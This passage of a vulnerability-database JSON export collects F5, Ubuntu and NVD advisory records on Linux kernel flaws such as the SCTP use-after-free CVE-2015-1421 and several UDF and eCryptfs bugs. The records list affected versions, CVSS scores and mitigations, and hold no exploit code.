\nEnterprise Manager| 3.0.0 - 3.1.1| None| Severe*| SCTP kernel module \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Severe*| SCTP kernel module \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Severe*| SCTP kernel module \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Severe*| SCTP kernel module \nBIG-IQ ADC| 4.5.0| None| Severe*| SCTP kernel module \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| High| SCTP FEP \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\n*The BIG-IP/BIG-IQ/Enterprise Manager software contains vulnerable code (SCTP kernel module), but the code is not enabled by default. Before a remote attacker can exploit this vulnerability, a locally authenticated administrative user must load the vulnerable SCTP kernel module, create a listener (such as self IP) on the control plane, and allow SCTP traffic on this listener. Because of the specific conditions required for exploit, F5 Product Development considers affected BIG-IP/BIG-IQ/Enterprise Manager systems as not vulnerable in a standard configuration and severely vulnerable if the described conditions are met.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nIf you must load the vulnerable SCTP kernel module for your environment, F5 recommends that you block upstream traffic to the control plane of the affected systems. To mitigate this vulnerability for an affected system, you should permit access to the management interface, and/or the self IP that exposes SCTP listeners, over a secure network.\n\nTraffix SDC \n\nTo mitigate this vulnerability for an affected system, you should use iptables rules to limit SCTP access to trusted users only.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2017-04-06T19:15:00", "published": "2015-09-10T03:22:00", "id": "F5:K17242", "href": "https://support.f5.com/csp/article/K17242", "title": "Linux kernel SCTP vulnerability CVE-2015-1421", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-03-19T09:02:05", "bulletinFamily": "software", "cvelist": ["CVE-2015-1421"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\n*The BIG-IP/BIG-IQ/Enterprise Manager software contains vulnerable code (SCTP kernel module), but the code is not enabled by default. Before a remote attacker can exploit this vulnerability, a locally authenticated administrative user must load the vulnerable SCTP kernel module, create a listener (such as self IP) on the control plane, and allow SCTP traffic on this listener. Because of the specific conditions required for exploit, F5 Product Development considers affected BIG-IP/BIG-IQ/Enterprise Manager systems as not vulnerable in a standard configuration and severely vulnerable if the described conditions are met.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nIf you must load the vulnerable SCTP kernel module for your environment, F5 recommends that you block upstream traffic to the control plane of the affected systems. To mitigate this vulnerability for an affected system, you should permit access to the management interface, and/or the self IP that exposes SCTP listeners, over a secure network.\n\nTraffix SDC \n\nTo mitigate this vulnerability for an affected system, you should use iptables rules to limit SCTP access to trusted users only.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-09-09T00:00:00", "published": "2015-09-09T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/200/sol17242.html", "id": "SOL17242", "title": "SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-9728", "CVE-2015-1421", "CVE-2014-9730", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9419", "CVE-2014-9731"], "description": "The Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP \n(Stream Control Transmission Protocol) subsystem during INIT collisions. A \nremote attacker could exploit this flaw to cause a denial of service \n(system crash) or potentially escalate their privileges on the system. \n(CVE-2015-1421)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2541-1", "href": "https://ubuntu.com/security/notices/USN-2541-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-0274", "CVE-2014-9728", "CVE-2014-9730", "CVE-2013-7421", "CVE-2014-9729", "CVE-2014-9731"], "description": "Eric Windisch discovered flaw in how the Linux kernel's XFS file system \nreplaces remote attributes. A local access with access to an XFS file \nsystem could exploit this flaw to escalate their privileges. \n(CVE-2015-0274)\n\nA flaw was discovered in the automatic loading of modules in the crypto \nsubsystem of the Linux kernel. A local user could exploit this flaw to load \ninstalled kernel modules, increasing the attack surface and potentially \nusing this to gain administrative privileges. (CVE-2013-7421)\n\nThe Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in the crypto subsystem when screening module names \nfor automatic module loading if the name contained a valid crypto module \nname, eg. vfat(aes). A local user could exploit this flaw to load installed \nkernel modules, increasing the attack surface and potentially using this to \ngain administrative privileges. (CVE-2014-9644)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2543-1", "href": "https://ubuntu.com/security/notices/USN-2543-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-0274", "CVE-2014-9728", "CVE-2014-9730", "CVE-2013-7421", "CVE-2014-9729", "CVE-2014-9731"], "description": "Eric Windisch discovered flaw in how the Linux kernel's XFS file system \nreplaces remote attributes. A local access with access to an XFS file \nsystem could exploit this flaw to escalate their privileges. \n(CVE-2015-0274)\n\nA flaw was discovered in the automatic loading of modules in the crypto \nsubsystem of the Linux kernel. A local user could exploit this flaw to load \ninstalled kernel modules, increasing the attack surface and potentially \nusing this to gain administrative privileges. (CVE-2013-7421)\n\nThe Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in the crypto subsystem when screening module names \nfor automatic module loading if the name contained a valid crypto module \nname, eg. vfat(aes). A local user could exploit this flaw to load installed \nkernel modules, increasing the attack surface and potentially using this to \ngain administrative privileges. (CVE-2014-9644)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2544-1", "href": "https://ubuntu.com/security/notices/USN-2544-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:38:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9529", "CVE-2014-9420", "CVE-2014-8160", "CVE-2014-9728", "CVE-2014-8989", "CVE-2014-9730", "CVE-2014-8559", "CVE-2015-0239", "CVE-2014-9584", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9428", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9731", "CVE-2014-9585"], "description": "A flaw was discovered in the Kernel Virtual Machine's (KVM) emulation of \nthe SYSTENTER instruction when the guest OS does not initialize the \nSYSENTER MSRs. A guest OS user could exploit this flaw to cause a denial of \nservice of the guest OS (crash) or potentially gain privileges on the guest \nOS. (CVE-2015-0239)\n\nAndy Lutomirski discovered an information leak in the Linux kernel's Thread \nLocal Storage (TLS) implementation allowing users to bypass the espfix to \nobtain information that could be used to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. A local user could exploit this \nflaw to obtain potentially sensitive information from kernel memory. \n(CVE-2014-8133)\n\nA restriction bypass was discovered in iptables when conntrack rules are \nspecified and the conntrack protocol handler module is not loaded into the \nLinux kernel. This flaw can cause the firewall rules on the system to be \nbypassed when conntrack rules are used. (CVE-2014-8160)\n\nA flaw was discovered with file renaming in the linux kernel. A local user \ncould exploit this flaw to cause a denial of service (deadlock and system \nhang). (CVE-2014-8559)\n\nA flaw was discovered in how supplemental group memberships are handled in \ncertain namespace scenarios. A local user could exploit this flaw to bypass \nfile permission restrictions. (CVE-2014-8989)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nPrasad J Pandit reported a flaw in the rock_continue function of the Linux \nkernel's ISO 9660 CDROM file system. A local user could exploit this flaw \nto cause a denial of service (system crash or hang). (CVE-2014-9420)\n\nA flaw was discovered in the fragment handling of the B.A.T.M.A.N. Advanced \nMeshing Protocol in the Linux kernel. A remote attacker could exploit this \nflaw to cause a denial of service (mesh-node system crash) via fragmented \npackets. (CVE-2014-9428)\n\nA race condition was discovered in the Linux kernel's key ring. A local \nuser could cause a denial of service (memory corruption or panic) or \npossibly have unspecified impact via the keyctl commands. (CVE-2014-9529)\n\nA memory leak was discovered in the ISO 9660 CDROM file system when parsing \nrock ridge ER records. A local user could exploit this flaw to obtain \nsensitive information from kernel memory via a crafted iso9660 image. \n(CVE-2014-9584)\n\nA flaw was discovered in the Address Space Layout Randomization (ASLR) of \nthe Virtual Dynamically linked Shared Objects (vDSO) location. This flaw \nmakes it easier for a local user to bypass the ASLR protection mechanism. \n(CVE-2014-9585)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2518-1", "href": "https://ubuntu.com/security/notices/USN-2518-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:37:09", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9529", "CVE-2014-9420", "CVE-2014-8160", "CVE-2014-9728", "CVE-2014-8989", "CVE-2014-9730", "CVE-2014-8559", "CVE-2015-0239", "CVE-2014-9584", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9428", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9731", "CVE-2014-9585"], "description": "A flaw was discovered in the Kernel Virtual Machine's (KVM) emulation of \nthe SYSTENTER instruction when the guest OS does not initialize the \nSYSENTER MSRs. A guest OS user could exploit this flaw to cause a denial of \nservice of the guest OS (crash) or potentially gain privileges on the guest \nOS. (CVE-2015-0239)\n\nAndy Lutomirski discovered an information leak in the Linux kernel's Thread \nLocal Storage (TLS) implementation allowing users to bypass the espfix to \nobtain information that could be used to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. A local user could exploit this \nflaw to obtain potentially sensitive information from kernel memory. \n(CVE-2014-8133)\n\nA restriction bypass was discovered in iptables when conntrack rules are \nspecified and the conntrack protocol handler module is not loaded into the \nLinux kernel. This flaw can cause the firewall rules on the system to be \nbypassed when conntrack rules are used. (CVE-2014-8160)\n\nA flaw was discovered with file renaming in the linux kernel. A local user \ncould exploit this flaw to cause a denial of service (deadlock and system \nhang). (CVE-2014-8559)\n\nA flaw was discovered in how supplemental group memberships are handled in \ncertain namespace scenarios. A local user could exploit this flaw to bypass \nfile permission restrictions. (CVE-2014-8989)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRadomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nPrasad J Pandit reported a flaw in the rock_continue function of the Linux \nkernel's ISO 9660 CDROM file system. A local user could exploit this flaw \nto cause a denial of service (system crash or hang). (CVE-2014-9420)\n\nA flaw was discovered in the fragment handling of the B.A.T.M.A.N. Advanced \nMeshing Protocol in the Linux kernel. A remote attacker could exploit this \nflaw to cause a denial of service (mesh-node system crash) via fragmented \npackets. (CVE-2014-9428)\n\nA race condition was discovered in the Linux kernel's key ring. A local \nuser could cause a denial of service (memory corruption or panic) or \npossibly have unspecified impact via the keyctl commands. (CVE-2014-9529)\n\nA memory leak was discovered in the ISO 9660 CDROM file system when parsing \nrock ridge ER records. A local user could exploit this flaw to obtain \nsensitive information from kernel memory via a crafted iso9660 image. \n(CVE-2014-9584)\n\nA flaw was discovered in the Address Space Layout Randomization (ASLR) of \nthe Virtual Dynamically linked Shared Objects (vDSO) location. This flaw \nmakes it easier for a local user to bypass the ASLR protection mechanism. \n(CVE-2014-9585)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicous \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalid inode size information . A local attacker, who is able to mount a \nmalicous UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicous UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicous UDF file \nsystem image, could exploit this flaw to read potential sensitve kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2517-1", "href": "https://ubuntu.com/security/notices/USN-2517-1", "title": "Linux kernel (Utopic HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:14:36", "description": "The UDF filesystem implementation in the Linux kernel before 3.18.2 does not ensure that space is available for storing a symlink target's name along with a trailing \\0 character, which allows local users to obtain sensitive information via a crafted filesystem image, related to fs/udf/symlink.c and fs/udf/unicode.c.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9731", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9731"], "modified": "2017-07-13T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9731", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The udf_pc_to_char function in fs/udf/symlink.c in the Linux kernel before 3.18.2 relies on component lengths that are unused, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9730", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9730"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9730", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The udf_read_inode function in fs/udf/inode.c in the Linux kernel before 3.18.2 does not ensure a certain data-structure size consistency, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9729", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9729"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9729", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9729", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "Off-by-one error in the ecryptfs_decode_from_filename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted filename.", "edition": 6, "cvss3": {}, "published": "2015-03-03T11:59:00", "title": "CVE-2014-9683", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9683"], "modified": "2016-12-24T02:59:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:linux:linux_kernel:3.18.1", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2014-9683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9683", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The UDF filesystem implementation in the Linux kernel before 3.18.2 does not validate certain lengths, which allows local users to cause a denial of service (buffer over-read and system crash) via a crafted filesystem image, related to fs/udf/inode.c and fs/udf/symlink.c.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9728", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9728"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9728", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address.", "edition": 6, "cvss3": {}, "published": "2014-12-26T00:59:00", "title": "CVE-2014-9419", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2018-01-05T02:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9419", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:34", "description": "The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, as demonstrated by use of a file descriptor associated with an ext4 filesystem.", "edition": 6, "cvss3": {}, "published": "2015-03-16T10:59:00", "title": "CVE-2014-7822", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7822"], "modified": "2017-01-03T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.15.8"], "id": 